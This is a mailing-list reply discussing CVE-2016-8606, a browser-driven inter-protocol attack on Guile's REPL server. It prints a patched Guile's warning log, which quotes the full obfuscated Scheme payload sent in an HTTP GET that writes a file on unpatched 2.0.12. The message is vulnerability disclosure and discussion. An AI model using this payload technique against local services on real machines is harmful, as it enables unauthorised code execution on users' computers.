Hi Christopher, On 10/16, Christopher Allan Webber wrote: > So, I guess this will work from a public site as well? Yes! The HTML I mentioned in my post is available here: (Though note that it won't work if you visit it over HTTPS, since HTTPS documents aren't allowed to XHR to HTTP.) If you visit it while a guile 2.0.13 repl is listening on 37146, you'll see this: [lizzie@empress b.l.i]$ guile --listen GNU Guile 2.0.13 Copyright (C) 1995-2016 Free Software Foundation, Inc. Guile comes with ABSOLUTELY NO WARRANTY; for details type `,show w'. This program is free software, and you are welcome to redistribute it under certain conditions; type `,show c' for details. Enter `,help' for help. scheme@(guile-user)> @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@ POSSIBLE BREAK-IN ATTEMPT ON THE REPL SERVER @@ @@ BY AN HTTP INTER-PROTOCOL EXPLOITATION ATTACK. See: @@ @@ @@ @@ Possible HTTP request received: "GET /?(let((ascii(((lambda(x)x)reverse)(((lambda(x)x)char-set-fold)((lambda(x)x)cons)(((lambda(x)x)make-list)((lambda(x)x)0))((lambda(x)x)char-set:ascii)))))(((lambda(x)x)with-output-to-file)(((lambda(x)x)string)(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)110))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)111))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)116))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)101))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)46))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)116))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)120))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)116)))(lambda()(((lambda(x)x)display)(((lambda(x)x)string)(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)62))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)58))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)41))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)10))))))) HTTP/1.1\r\nHost: localhost:37146\r\nConnection: keep-alive\r\nOrigin: http://s3-us-west-2.amazonaws.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\r\nAccept: */*\r\nReferer: http://s3-us-west-2.amazonaws.com/blog.lizzie.io/exploiting-CVE-2016-8606-exploit.html\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: en-US,en;q=0.8\r\n\r\n" @@ The associated socket has been closed. @@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ I don't recommend visiting it while a 2.0.12 repl is open, but it will write a file in that case. > I'm always a bit fuzzy about what browsers do and don't allow, but > I'm stunned that a browser will let a request from some > http://foo.example/ to http://localhost:37146/, even for just a GET. > It seems like there are all sorts of daemons you can exploit that > way. It's a little absurd, yeah. :/ Maybe this string of exploits will convince others to reconsider, but probably this kind of vulnerability will be around for a while. Thanks, Lizzie.